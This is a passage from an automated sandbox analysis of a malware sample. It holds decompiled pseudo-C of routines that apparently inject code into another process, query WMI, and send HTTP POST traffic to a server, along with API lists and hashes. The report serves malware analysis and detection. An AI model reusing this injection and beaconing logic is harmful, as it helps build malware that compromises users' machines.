    						__imp__#6(_v52);
    						goto L53;
    					}
    					_t262 = _v32;
    					_v28 = 0;
    					_v20 = 0;
    					__eflags = _t262;
    					if(_t262 == 0) {
    						L49:
    						 *((intOrPtr*)( *_t262 + 8))(_t262);
    						__eflags = _t252;
    						if(_t252 == 0) {
    							E03608600( &_v36, 0);
    							_t320 = _v36;
    						} else {
    							 *(_t320 + 8) = _t252;
    							 *_t320 = E036091C9(_v100);
    							 *((intOrPtr*)(_t320 + 4)) = E036091C9(_v56);
    						}
    						goto L52;
    					} else {
    						goto L6;
    					}
    					while(1) {
    						L6:
    						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
    						__eflags = _t186;
    						if(_t186 != 0) {
    							break;
    						}
    						_v16 = 0;
    						_v48 = 0;
    						_v12 = 0;
    						_v24 = 0;
    						__eflags = _v84;
    						if(_v84 == 0) {
    							break;
    						}
    						_t187 = _v28;
    						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
    						__eflags = _t188;
    						if(_t188 >= 0) {
    							__imp__#20(_v24, 1,  &_v16);
    							__imp__#19(_v24, 1,  &_v48);
    							_t46 = _t320 + 0xc; // 0xc
    							_t253 = _t46;
    							_t327 = _t252 << 3;
    							_t47 = _t327 + 8; // 0x8
    							_t192 = E0360867E(_t327, _t47);
    							__eflags = _t192;
    							if(_t192 == 0) {
    								__imp__#16(_v24);
    								_t193 = _v28;
    								 *((intOrPtr*)( *_t193 + 8))(_t193);
    								L46:
    								_t252 = _v20;
    								break;
    							}
    							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
    							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E036085EA( *(_t327 +  *_t253) << 3);
    							_t200 =  *_t253;
    							__eflags =  *(_t327 + _t200 + 4);
    							if( *(_t327 + _t200 + 4) == 0) {
    								_t136 = _t320 + 0xc; // 0xc
    								E03608600(_t136, 0);
    								E03608600( &_v36, 0);
    								__imp__#16(_v24);
    								_t205 = _v28;
    								 *((intOrPtr*)( *_t205 + 8))(_t205);
    								_t320 = _v36;
    								goto L46;
    							}
    							_t207 = _v16;
    							while(1) {
    								_v12 = _t207;
    								__eflags = _t207 - _v48;
    								if(_t207 > _v48) {
    									break;
    								}
    								_v44 = _v44 & 0x00000000;
    								_t209 =  &_v12;
    								__imp__#25(_v24, _t209,  &_v44);
    								__eflags = _t209;
    								if(_t209 < 0) {
    									break;
    								}
    								_t212 = E036091C9(_v44);
    								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
    								_t213 = _v28;
    								_t281 =  *_t213;
    								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
    								__eflags = _t214;
    								if(_t214 < 0) {
    									L39:
    									__imp__#6(_v44);
    									_t207 = _v12 + 1;
    									__eflags = _t207;
    									continue;
    								}
    								_v92 = E036095C7(_t281, 0x250);
    								 *_t329 = 0x4cc;
    								_t217 = E036095C7(_t281);
    								_t283 = _v80;
    								_v96 = _t217;
    								_t218 = _t283 & 0x0000ffff;
    								__eflags = _t218 - 0xb;
    								if(__eflags > 0) {
    									_t219 = _t218 - 0x10;
    									__eflags = _t219;
    									if(_t219 == 0) {
    										L35:
    										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E036085EA(0x18);
    										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
    										__eflags = _t289;
    										if(_t289 == 0) {
    											L38:
    											E036085BB( &_v92);
    											E036085BB( &_v96);
    											__imp__#9( &_v80);
    											goto L39;
    										}
    										_push(_v72);
    										_push(L"%d");
    										L37:
    										_push(0xc);
    										_push(_t289);
    										E03609626();
    										_t329 = _t329 + 0x10;
    										goto L38;
    									}
    									_t230 = _t219 - 1;
    									__eflags = _t230;
    									if(_t230 == 0) {
    										L33:
    										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E036085EA(0x18);
    										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
    										__eflags = _t289;
    										if(_t289 == 0) {
    											goto L38;
    										}
    										_push(_v72);
    										_push(L"%u");
    										goto L37;
    									}
    									_t235 = _t230 - 1;
    									__eflags = _t235;
    									if(_t235 == 0) {
    										goto L33;
    									}
    									__eflags = _t235 == 1;
    									if(_t235 == 1) {
    										goto L33;
    									}
    									L28:
    									__eflags = _t283 & 0x00002000;
    									if((_t283 & 0x00002000) == 0) {
    										_v88 = E036095C7(_t283, 0x219);
    										E03609626( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
    										E036085BB( &_v88);
    										_t329 = _t329 + 0x18;
    										_t298 =  &_v616;
    										L31:
    										_t242 = E036091C9(_t298);
    										L32:
    										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
    										goto L38;
    									}
    									_t242 = E0360DA2B( &_v80);
    									goto L32;
    								}
    								if(__eflags == 0) {
    									__eflags = _v72 - 0xffff;
    									_t298 = L"TRUE";
    									if(_v72 != 0xffff) {
    										_t298 = L"FALSE";
    									}
    									goto L31;
    								}
    								_t243 = _t218 - 1;
    								__eflags = _t243;
    								if(_t243 == 0) {
    									goto L38;
    								}
    								_t244 = _t243 - 1;
    								__eflags = _t244;
    								if(_t244 == 0) {
    									goto L35;
    								}
    								_t245 = _t244 - 1;
    								__eflags = _t245;
    								if(_t245 == 0) {
    									goto L35;
    								}
    								__eflags = _t245 != 5;
    								if(_t245 != 5) {
    									goto L28;
    								}
    								_t298 = _v72;
    								goto L31;
    							}
    							__imp__#16(_v24);
    							_t210 = _v28;
    							 *((intOrPtr*)( *_t210 + 8))(_t210);
    							_t252 = _v20;
    							L42:
    							_t262 = _v32;
    							_t252 = _t252 + 1;
    							_v20 = _t252;
    							__eflags = _t262;
    							if(_t262 != 0) {
    								continue;
    							}
    							L48:
    							_t324 = _v40;
    							goto L49;
    						}
    						_t247 = _v28;
    						 *((intOrPtr*)( *_t247 + 8))(_t247);
    						goto L42;
    					}
    					_t262 = _v32;
    					goto L48;
    				} else {
    					E03608600( &_v36, _t322);
    					_t320 = _v36;
    					goto L53;
    				}
    			}

    APIs
      • Part of subcall function 0360D52E: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,0360D82E,00000C5B,00000000,?,00000000), ref: 0360D541
      • Part of subcall function 0360D52E: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0360D82E,00000C5B,00000000,?,00000000), ref: 0360D552
      • Part of subcall function 0360D52E: CoCreateInstance.OLE32(0361B840,00000000,00000001,0361B850,?,?,0360D82E,00000C5B,00000000,?,00000000), ref: 0360D569
      • Part of subcall function 0360D52E: SysAllocString.OLEAUT32(00000000), ref: 0360D574
      • Part of subcall function 0360D52E: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0360D82E,00000C5B,00000000,?,00000000), ref: 0360D59F
      • Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8
    • SysAllocString.OLEAUT32(00000000), ref: 0360DBF0
    • SysAllocString.OLEAUT32(00000000), ref: 0360DC04
    • SysFreeString.OLEAUT32(?), ref: 0360DF8D
    • SysFreeString.OLEAUT32(?), ref: 0360DF96
      • Part of subcall function 03608600: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,03606020), ref: 03608646
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
    • String ID: FALSE$TRUE
    • API String ID: 1290676130-1412513891
    • Opcode ID: f44da292390cdc516ec257fd32f271c0f4037225988bbebcf83f93119fdc2bd0
    • Instruction ID: 00b4bf9b4c3fed2e6dac9d31b4f32db68cef4d6a4bff551d9f5dff9507dff6f0
    • Opcode Fuzzy Hash: f44da292390cdc516ec257fd32f271c0f4037225988bbebcf83f93119fdc2bd0
    • Instruction Fuzzy Hash: CAE16B75E00219AFCB19EFE4C996AAFBBB9FF48300F14855DE505AB2D4DB30A901CB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 59%
    			E0360C6CB(intOrPtr __ecx, intOrPtr __edx) {
    				signed int _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				intOrPtr _v36;
    				struct HINSTANCE__* _v40;
    				char _v44;
    				char _v56;
    				char _v72;
    				struct _WNDCLASSEXA _v120;
    				intOrPtr _t69;
    				intOrPtr _t71;
    				intOrPtr _t75;
    				intOrPtr _t80;
    				intOrPtr _t92;
    				intOrPtr _t95;
    				intOrPtr _t96;
    				struct HWND__* _t106;
    				intOrPtr* _t113;
    				struct HINSTANCE__* _t116;
    				intOrPtr _t120;
    				intOrPtr _t126;
    				intOrPtr _t131;
    				intOrPtr _t134;
    				intOrPtr _t136;
    				intOrPtr _t139;
    				char _t140;
    				intOrPtr _t141;
    
    				_t69 =  *0x361e688; // 0x33f0000
    				_t126 = __ecx;
    				_t134 = __edx;
    				_t116 = 0;
    				_v36 = __edx;
    				_v16 = 0;
    				_v44 = 0;
    				_v40 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				_v24 = 0;
    				_v20 = __ecx;
    				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
    					E0360E249(0x1f4);
    					_t116 = 0;
    				}
    				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
    				_v28 = _t116;
    				if( *_t113 != 0x4550) {
    					L12:
    					if(_v8 != 0) {
    						_t75 =  *0x361e780; // 0x0
    						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
    						_v8 = _v8 & 0x00000000;
    					}
    					L14:
    					if(_v12 != 0) {
    						_t136 =  *0x361e780; // 0x0
    						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
    					}
    					if(_v16 != 0) {
    						_t71 =  *0x361e780; // 0x0
    						 *((intOrPtr*)(_t71 + 0x20))(_v16);
    					}
    					return _v8;
    				}
    				_push(_t116);
    				_push(0x8000000);
    				_v44 =  *((intOrPtr*)(_t113 + 0x50));
    				_push(0x40);
    				_push( &_v44);
    				_push(_t116);
    				_push(0xe);
    				_push( &_v16);
    				_t80 =  *0x361e780; // 0x0
    				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
    					goto L12;
    				}
    				_v120.style = 0xb;
    				_v120.cbSize = 0x30;
    				_v120.lpszClassName =  &_v56;
    				asm("movsd");
    				_v120.lpfnWndProc = DefWindowProcA;
    				asm("movsd");
    				asm("movsd");
    				asm("movsb");
    				asm("movsd");
    				asm("movsd");
    				asm("movsw");
    				asm("movsb");
    				_v120.cbWndExtra = 0;
    				_v120.lpszMenuName = 0;
    				_v120.cbClsExtra = 0;
    				_v120.hInstance = 0;
    				if(RegisterClassExA( &_v120) != 0) {
    					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
    					if(_t106 != 0) {
    						DestroyWindow(_t106);
    						UnregisterClassA( &_v56, 0);
    					}
    				}
    				_t139 =  *0x361e780; // 0x0
    				_push(0x40);
    				_push(0);
    				_push(2);
    				_push( &_v24);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push( &_v12);
    				_push(GetCurrentProcess());
    				_push(_v16);
    				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
    					_t126 = _v20;
    					goto L12;
    				} else {
    					_push(0x40);
    					_push(0);
    					_push(2);
    					_push( &_v24);
    					_push(0);
    					_push(0);
    					_push(0);
    					_t126 = _v20;
    					_push( &_v8);
    					_t92 =  *0x361e780; // 0x0
    					_push(_t126);
    					_push(_v16);
    					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
    						goto L12;
    					}
    					_t140 = E0360864F( *0x361e688, 0x1ac4);
    					_v32 = _t140;
    					if(_t140 == 0) {
    						goto L12;
    					}
    					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
    					_t95 =  *0x361e684; // 0x530f6c8
    					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
    					_t120 =  *0x361e684; // 0x530f6c8
    					_t131 = _t96;
    					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
    					E03608600( &_v32, 0x1ac4);
    					_t141 =  *0x361e688; // 0x33f0000
    					 *0x361e688 = _t131;
    					E036086C7(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
    					E0360C64A(_v12, _v8, _v36);
    					 *0x361e688 = _t141;
    					goto L14;
    				}
    			}

    APIs
    • RegisterClassExA.USER32(00000030), ref: 0360C790
    • CreateWindowExA.USER32 ref: 0360C7BB
    • DestroyWindow.USER32(00000000), ref: 0360C7C6
    • UnregisterClassA.USER32 ref: 0360C7D1
    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0360C7ED
    • GetCurrentProcess.KERNEL32(00000000), ref: 0360C8E6
      • Part of subcall function 03608600: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,03606020), ref: 03608646
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
    • String ID: 0$cdcdwqwqwq$sadccdcdsasa
    • API String ID: 3082384575-2319545179
    • Opcode ID: 24498192c60fc45ec1e7898d26cdcf1025088bfadc79be55c78ee6ae509d32f3
    • Instruction ID: ae0d9c5d3ee182d900fdc017c4a05233d11a01c17d93cee90034619fcf8da895
    • Opcode Fuzzy Hash: 24498192c60fc45ec1e7898d26cdcf1025088bfadc79be55c78ee6ae509d32f3
    • Instruction Fuzzy Hash: 2C714D71D00208AFDB15DF95D949EAFBBB9FB49700F18055AF905AB284D771AA00CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E0360E673(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
    				char _v8;
    				char _v12;
    				signed int _v16;
    				signed int _v20;
    				char _v24;
    				intOrPtr _v28;
    				char _v32;
    				intOrPtr _v36;
    				signed int _v40;
    				signed int _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				char _v64;
    				int _v76;
    				void* _v80;
    				intOrPtr _v100;
    				int _v104;
    				void* _v108;
    				intOrPtr _v112;
    				intOrPtr _v116;
    				char* _v120;
    				void _v124;
    				char _v140;
    				void _v396;
    				void _v652;
    				intOrPtr _t105;
    				intOrPtr _t113;
    				intOrPtr* _t115;
    				intOrPtr _t118;
    				intOrPtr _t121;
    				intOrPtr _t124;
    				intOrPtr _t127;
    				intOrPtr _t131;
    				char _t133;
    				intOrPtr _t136;
    				char _t138;
    				char _t139;
    				intOrPtr _t141;
    				intOrPtr _t147;
    				intOrPtr _t154;
    				intOrPtr _t158;
    				intOrPtr _t162;
    				intOrPtr _t164;
    				intOrPtr _t166;
    				intOrPtr _t172;
    				intOrPtr _t176;
    				void* _t183;
    				void* _t185;
    				intOrPtr _t186;
    				char _t195;
    				intOrPtr _t203;
    				intOrPtr _t204;
    				signed int _t209;
    				void _t212;
    				intOrPtr _t213;
    				void* _t214;
    				intOrPtr _t216;
    				char _t217;
    				intOrPtr _t218;
    				signed int _t219;
    				signed int _t220;
    				void* _t221;
    
    				_v40 = _v40 & 0x00000000;
    				_v24 = 4;
    				_v36 = 1;
    				_t214 = __edx;
    				memset( &_v396, 0, 0x100);
    				memset( &_v652, 0, 0x100);
    				_v64 = E036095AD(0x85b);
    				_v60 = E036095AD(0xdc9);
    				_v56 = E036095AD(0x65d);
    				_v52 = E036095AD(0xdd3);
    				_t105 = E036095AD(0xb74);
    				_v44 = _v44 & 0;
    				_t212 = 0x3c;
    				_v48 = _t105;
    				memset( &_v124, 0, 0x100);
    				_v116 = 0x10;
    				_v120 =  &_v140;
    				_v124 = _t212;
    				_v108 =  &_v396;
    				_v104 = 0x100;
    				_v80 =  &_v652;
    				_push( &_v124);
    				_push(0);
    				_v76 = 0x100;
    				_push(E0360C384(_t214));
    				_t113 =  *0x361e6a4; // 0x530fc18
    				_push(_t214);
    				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
    					_t209 = 0;
    					_v20 = 0;
    					do {
    						_t115 =  *0x361e6a4; // 0x530fc18
    						_v12 = 0x8404f700;
    						_t213 =  *_t115( *0x361e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
    						if(_t213 != 0) {
    							_t195 = 3;
    							_t185 = 4;
    							_v8 = _t195;
    							_t118 =  *0x361e6a4; // 0x530fc18
    							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
    							_v8 = 0x3a98;
    							_t121 =  *0x361e6a4; // 0x530fc18
    							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
    							_v8 = 0x493e0;
    							_t124 =  *0x361e6a4; // 0x530fc18
    							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
    							_v8 = 0x493e0;
    							_t127 =  *0x361e6a4; // 0x530fc18
    							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
    							_t131 =  *0x361e6a4; // 0x530fc18
    							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
    							if(_a24 != 0) {
    								E036097F2(_a24);
    							}
    							if(_t186 != 0) {
    								_t133 = 0x8484f700;
    								if(_v112 != 4) {
    									_t133 = _v12;
    								}
    								_t136 =  *0x361e6a4; // 0x530fc18
    								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
    								_v8 = _t216;
    								if(_a24 != 0) {
    									E036097F2(_a24);
    								}
    								if(_t216 != 0) {
    									_t138 = 4;
    									if(_v112 != _t138) {
    										L19:
    										_t139 = E036095AD(0x777);
    										_t217 = _t139;
    										_v12 = _t217;
    										_t141 =  *0x361e6a4; // 0x530fc18
    										_t218 = _v8;
    										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0360C384(_t217), _a4, _a8);
    										E036085A8( &_v12);
    										if(_a24 != 0) {
    											E036097F2(_a24);
    										}
    										if(_v28 != 0) {
    											L28:
    											_v24 = 8;
    											_push(0);
    											_v32 = 0;
    											_v28 = 0;
    											_push( &_v24);
    											_push( &_v32);
    											_t147 =  *0x361e6a4; // 0x530fc18
    											_push(0x13);
    											_push(_t218);
    											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
    												_t219 = E0360972F( &_v32);
    												if(_t219 == 0xc8) {
    													 *_a20 = _v8;
    													 *_a12 = _t213;
    													 *_a16 = _t186;
    													return 0;
    												}
    												_t220 =  ~_t219;
    												L32:
    												_t154 =  *0x361e6a4; // 0x530fc18
    												 *((intOrPtr*)(_t154 + 8))(_v8);
    												L33:
    												if(_t186 != 0) {
    													_t158 =  *0x361e6a4; // 0x530fc18
    													 *((intOrPtr*)(_t158 + 8))(_t186);
    												}
    												if(_t213 != 0) {
    													_t203 =  *0x361e6a4; // 0x530fc18
    													 *((intOrPtr*)(_t203 + 8))(_t213);
    												}
    												return _t220;
    											}
    											GetLastError();
    											_t220 = 0xfffffff8;
    											goto L32;
    										} else {
    											GetLastError();
    											_t162 =  *0x361e6a4; // 0x530fc18
    											 *((intOrPtr*)(_t162 + 8))(_t218);
    											_t218 = 0;
    											goto L23;
    										}
    									}
    									_v12 = _t138;
    									_push( &_v12);
    									_push( &_v16);
    									_t172 =  *0x361e6a4; // 0x530fc18
    									_push(0x1f);
    									_push(_t216);
    									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
    										L18:
    										GetLastError();
    										goto L19;
    									}
    									_v16 = _v16 | 0x00003380;
    									_push(4);
    									_push( &_v16);
    									_t176 =  *0x361e6a4; // 0x530fc18
    									_push(0x1f);
    									_push(_t216);
    									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
    										goto L19;
    									}
    									goto L18;
    								} else {
    									GetLastError();
    									L23:
    									_t164 =  *0x361e6a4; // 0x530fc18
    									 *((intOrPtr*)(_t164 + 8))(_t186);
    									_t186 = 0;
    									goto L24;
    								}
    							} else {
    								GetLastError();
    								L24:
    								_t166 =  *0x361e6a4; // 0x530fc18
    								 *((intOrPtr*)(_t166 + 8))(_t213);
    								_t213 = 0;
    								goto L25;
    							}
    						}
    						GetLastError();
    						L25:
    						_t204 = _t218;
    						_t209 = _v20 + 1;
    						_v20 = _t209;
    					} while (_t209 < 2);
    					_v8 = _t218;
    					if(_t204 != 0) {
    						goto L28;
    					}
    					_t220 = 0xfffffffe;
    					goto L33;
    				}
    				_t183 = 0xfffffffc;
    				return _t183;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: memset$ErrorLast
    • String ID: POST
    • API String ID: 2570506013-1814004025
    • Opcode ID: 9ff26fc24ebf0dcdfbc8b4b9503b9dda121ebdea8bd94035e91868bb24c0a659
    • Instruction ID: 66c36c8654a8f073f1f1281289e35ee984be5ece8e5b807d958e1cd746c84d77
    • Opcode Fuzzy Hash: 9ff26fc24ebf0dcdfbc8b4b9503b9dda121ebdea8bd94035e91868bb24c0a659
    • Instruction Fuzzy Hash: 2DB17371900218AFDB15EFA4DD89E9FBBBCEF48310F14446AF505EB290DB759A40CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 28%
    			E036116C3(signed int* _a4) {
    				char _v8;
    				_Unknown_base(*)()* _v12;
    				_Unknown_base(*)()* _v16;
    				char _v20;
    				_Unknown_base(*)()* _t16;
    				_Unknown_base(*)()* _t17;
    				void* _t22;
    				intOrPtr* _t28;
    				signed int _t29;
    				signed int _t30;
    				struct HINSTANCE__* _t32;
    				void* _t34;
    
    				_t30 = 0;
    				_v8 = 0;
    				_t32 = GetModuleHandleA("advapi32.dll");
    				if(_t32 == 0) {
    					L9:
    					return 1;
    				}
    				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
    				_v12 = _t16;
    				if(_t16 == 0) {
    					goto L9;
    				}
    				_t17 = GetProcAddress(_t32, "CryptGenRandom");
    				_v16 = _t17;
    				if(_t17 == 0) {
    					goto L9;
    				}
    				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
    				if(_t28 == 0) {
    					goto L9;
    				}
    				_push(0xf0000000);
    				_push(1);
    				_push(0);
    				_push(0);
    				_push( &_v8);
    				if(_v12() == 0) {
    					goto L9;
    				}
    				_t22 = _v16(_v8, 4,  &_v20);
    				 *_t28(_v8, 0);
    				if(_t22 == 0) {
    					goto L9;
    				}
    				_t29 = 0;
    				do {
    					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
    					_t29 = _t29 + 1;
    				} while (_t29 < 4);
    				 *_a4 = _t30;
    				return 0;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,03607640,?,?,00000000,?), ref: 036116D6
    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 036116EE
    • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 036116FD
    • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 0361170C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: AddressProc$HandleModule
    • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
    • API String ID: 667068680-129414566
    • Opcode ID: c84d79cc54098d65049b0350e4f2573c88260a3ef7f874c97738dfd014a5cba9
    • Instruction ID: 7800860c95894ac9d6b3ec7710c14c0e7298cd8da124294f9c04b43009365b00
    • Opcode Fuzzy Hash: c84d79cc54098d65049b0350e4f2573c88260a3ef7f874c97738dfd014a5cba9
    • Instruction Fuzzy Hash: 76115436A00619BADB11DBB98C98DBFBBB9AF46650F1C0464EB15E3341D670CA118AA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0361212D(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
    				signed int _t12;
    				signed int _t13;
    				int _t15;
    				char* _t24;
    				char* _t26;
    				char* _t28;
    				char* _t29;
    				signed int _t40;
    				char* _t43;
    				char* _t45;
    				long long* _t47;
    
    				_t12 = _a20;
    				if(_t12 == 0) {
    					_t12 = 0x11;
    				}
    				_t26 = _a4;
    				_push(_t30);
    				 *_t47 = _a12;
    				_push(_t12);
    				_push("%.*g");
    				_push(_a8);
    				_push(_t26);
    				L03612290();
    				_t40 = _t12;
    				if(_t40 < 0 || _t40 >= _a8) {
    					L19:
    					_t13 = _t12 | 0xffffffff;
    					goto L20;
    				} else {
    					L036122D8();
    					_t15 =  *((intOrPtr*)( *_t12));
    					if(_t15 != 0x2e) {
    						_t24 = strchr(_t26, _t15);
    						if(_t24 != 0) {
    							 *_t24 = 0x2e;
    						}
    					}
    					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
    						L11:
    						_t43 = strchr(_t26, 0x65);
    						_t28 = _t43;
    						if(_t43 == 0) {
    							L18:
    							_t13 = _t40;
    							L20:
    							return _t13;
    						}
    						_t45 = _t43 + 1;
    						_t29 = _t28 + 2;
    						if( *_t45 == 0x2d) {
    							_t45 = _t29;
    						}
    						while( *_t29 == 0x30) {
    							_t29 = _t29 + 1;
    						}
    						if(_t29 != _t45) {
    							E036086EC(_t45, _t29, _t40 - _t29 + _a4);
    							_t40 = _t40 + _t45 - _t29;
    						}
    						goto L18;
    					} else {
    						_t6 = _t40 + 3; // 0x36109bd
    						_t12 = _t6;
    						if(_t12 >= _a8) {
    							goto L19;
    						}
    						_t26[_t40] = 0x302e;
    						( &(_t26[2]))[_t40] = 0;
    						_t40 = _t40 + 2;
    						goto L11;
    					}
    				}
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: strchr$_snprintflocaleconv
    • String ID: %.*g
    • API String ID: 1910550357-952554281
    • Opcode ID: e9e2bb11cd5b7c30722dd86478eb3b3a2d76cf5ef492399945dd52a9f932c3a2
    • Instruction ID: 9919f43df9f93d34e1688e108e6db5b8fbd4e6514661b35488924f985028df05
    • Opcode Fuzzy Hash: e9e2bb11cd5b7c30722dd86478eb3b3a2d76cf5ef492399945dd52a9f932c3a2
    • Instruction Fuzzy Hash: A421297660430E2AD725DA289CA6B6FBB9C9B01630F1C0959EB108F281D674D87083AC
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: _snprintfqsort
    • String ID: %I64d$false$null$true
    • API String ID: 756996078-4285102228
    • Opcode ID: cfe9b315834ae06fba0f90bae4373b51d79bd5693fddc394e3ba6556b671431c
    • Instruction ID: 7ca177b86a91684ecb2445d7c1fd207abd9386f8247ca3a30027600d1f3cfc65
    • Opcode Fuzzy Hash: cfe9b315834ae06fba0f90bae4373b51d79bd5693fddc394e3ba6556b671431c
    • Instruction Fuzzy Hash: EAE18CB190020ABFDF11EF65CD46EAF3BA9FF15344F088059FD159A251E631CAB18BA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
    				char _v8;
    				char _v16;
    				short _v144;
    				short _v664;
    				void* _t20;
    				struct HINSTANCE__* _t23;
    				long _t24;
    				long _t25;
    				char* _t29;
    				WCHAR* _t34;
    				long _t35;
    				intOrPtr _t39;
    				intOrPtr _t40;
    				intOrPtr _t42;
    				void* _t52;
    				int _t56;
    				void* _t57;
    				intOrPtr* _t58;
    				void* _t60;
    
    				_t52 = __edx;
    				if(_a8 != 1) {
    					if(_a8 == 0) {
    						_t42 =  *0x361e684; // 0x530f6c8
    						 *((intOrPtr*)(_t42 + 0xc8))( *0x361e6a8, 0);
    					}
    					L15:
    					return 1;
    				}
    				E036085D5();
    				_t20 = E036097F2( &_v16);
    				_t60 = _t52;
    				if(_t60 < 0 || _t60 <= 0 && _t20 < 0x2e830) {
    					goto L15;
    				} else {
    					E03608F5E();
    					GetModuleHandleA(0);
    					_t23 = _a4;
    					 *0x361e69c = _t23;
    					_t24 = GetModuleFileNameW(_t23,  &_v664, 0x104);
    					_t25 = GetLastError();
    					if(_t24 == 0 || _t25 == 0x7a) {
    						L10:
    						return 0;
    					} else {
    						memset( &_v144, 0, 0x80);
    						_t58 = _t57 + 0xc;
    						_t56 = 0;
    						do {
    							_t29 = E036095AD(_t56);
    							_a8 = _t29;
